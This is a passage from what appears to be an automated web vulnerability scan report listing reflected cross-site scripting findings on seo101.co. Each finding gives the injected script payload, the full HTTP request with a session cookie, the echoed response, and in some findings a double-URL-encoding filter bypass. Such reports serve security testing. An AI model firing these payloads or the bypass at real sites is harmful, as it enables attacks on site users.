Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<c2d49</
...[SNIP]...
<c2d49</script><script>alert(1)</script>0cd56afdb20/title>
...[SNIP]...

4.144. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload fedf6><script>alert(1)</script>7b52451862d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cfedf6><script>alert(1)</script>7b52451862d/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<fedf6><script>alert(1)</script>7b52451862d/title>
...[SNIP]...

4.145. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 7e5f4><script>alert(1)</script>46e7cca4e15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/7e5f4><script>alert(1)</script>46e7cca4e15/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:45:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</7e5f4><script>alert(1)</script>46e7cca4e15/img/total.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.146. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8c8d"><script>alert(1)</script>53d4fbe7a9e was submitted in the REST URL parameter 2. This input was echoed as f8c8d\"><script>alert(1)</script>53d4fbe7a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf8c8d"><script>alert(1)</script>53d4fbe7a9e/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:45:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<f8c8d\"><script>alert(1)</script>53d4fbe7a9e/img/total.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.147. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f3bbe%253balert%25281%2529%252f%252f26b976fe45e was submitted in the REST URL parameter 2. This input was echoed as f3bbe;alert(1)//26b976fe45e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf3bbe%253balert%25281%2529%252f%252f26b976fe45e/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<f3bbe;alert(1)//26b976fe45e/img/total.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.148. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78cd"><script>alert(1)</script>b046ed0c2ea was submitted in the REST URL parameter 3. This input was echoed as e78cd\"><script>alert(1)</script>b046ed0c2ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imge78cd"><script>alert(1)</script>b046ed0c2ea/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imge78cd\"><script>alert(1)</script>b046ed0c2ea/total.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.149. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc8c5%253balert%25281%2529%252f%252ff4f7b22376 was submitted in the REST URL parameter 3. This input was echoed as bc8c5;alert(1)//f4f7b22376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgbc8c5%253balert%25281%2529%252f%252ff4f7b22376/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:58:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgbc8c5;alert(1)//f4f7b22376/total.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.150. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b720e%253balert%25281%2529%252f%252fb6ff4140a3d was submitted in the REST URL parameter 4. This input was echoed as b720e;alert(1)//b6ff4140a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.pngb720e%253balert%25281%2529%252f%252fb6ff4140a3d HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:02:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26875


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/total.pngb720e;alert(1)//b6ff4140a3d SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.151. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e71f6"><script>alert(1)</script>0777330d80 was submitted in the REST URL parameter 4. This input was echoed as e71f6\"><script>alert(1)</script>0777330d80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.pnge71f6"><script>alert(1)</script>0777330d80 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:58:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/total.pnge71f6\"><script>alert(1)</script>0777330d80 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.152. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2267"><script>alert(1)</script>30ad2cd3560 was submitted in the REST URL parameter 1. This input was echoed as a2267\"><script>alert(1)</script>30ad2cd3560 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Ca2267"><script>alert(1)</script>30ad2cd3560/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:36:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<a2267\"
...[SNIP]...
<a2267\"><script>alert(1)</script>30ad2cd3560/title>
...[SNIP]...

4.153. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a15</script><script>alert(1)</script>b591e76bc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Ce9a15</script><script>alert(1)</script>b591e76bc8/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:39:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26946


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<e9a15</
...[SNIP]...
<e9a15</script><script>alert(1)</script>b591e76bc8/title>
...[SNIP]...

4.154. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 7bb35><script>alert(1)</script>d8953906b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C7bb35><script>alert(1)</script>d8953906b6b/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<7bb35><script>alert(1)</script>d8953906b6b/title>
...[SNIP]...

4.155. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 13847><script>alert(1)</script>57bbfc96efe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/13847><script>alert(1)</script>57bbfc96efe/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</13847><script>alert(1)</script>57bbfc96efe/img/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.156. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65624"><script>alert(1)</script>6457cd1dab2 was submitted in the REST URL parameter 2. This input was echoed as 65624\"><script>alert(1)</script>6457cd1dab2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C65624"><script>alert(1)</script>6457cd1dab2/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:45:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<65624\"><script>alert(1)</script>6457cd1dab2/img/xml-sitemap.jpeg seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.157. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be063%253balert%25281%2529%252f%252f1edc52f10f0 was submitted in the REST URL parameter 2. This input was echoed as be063;alert(1)//1edc52f10f0 in the application's response.

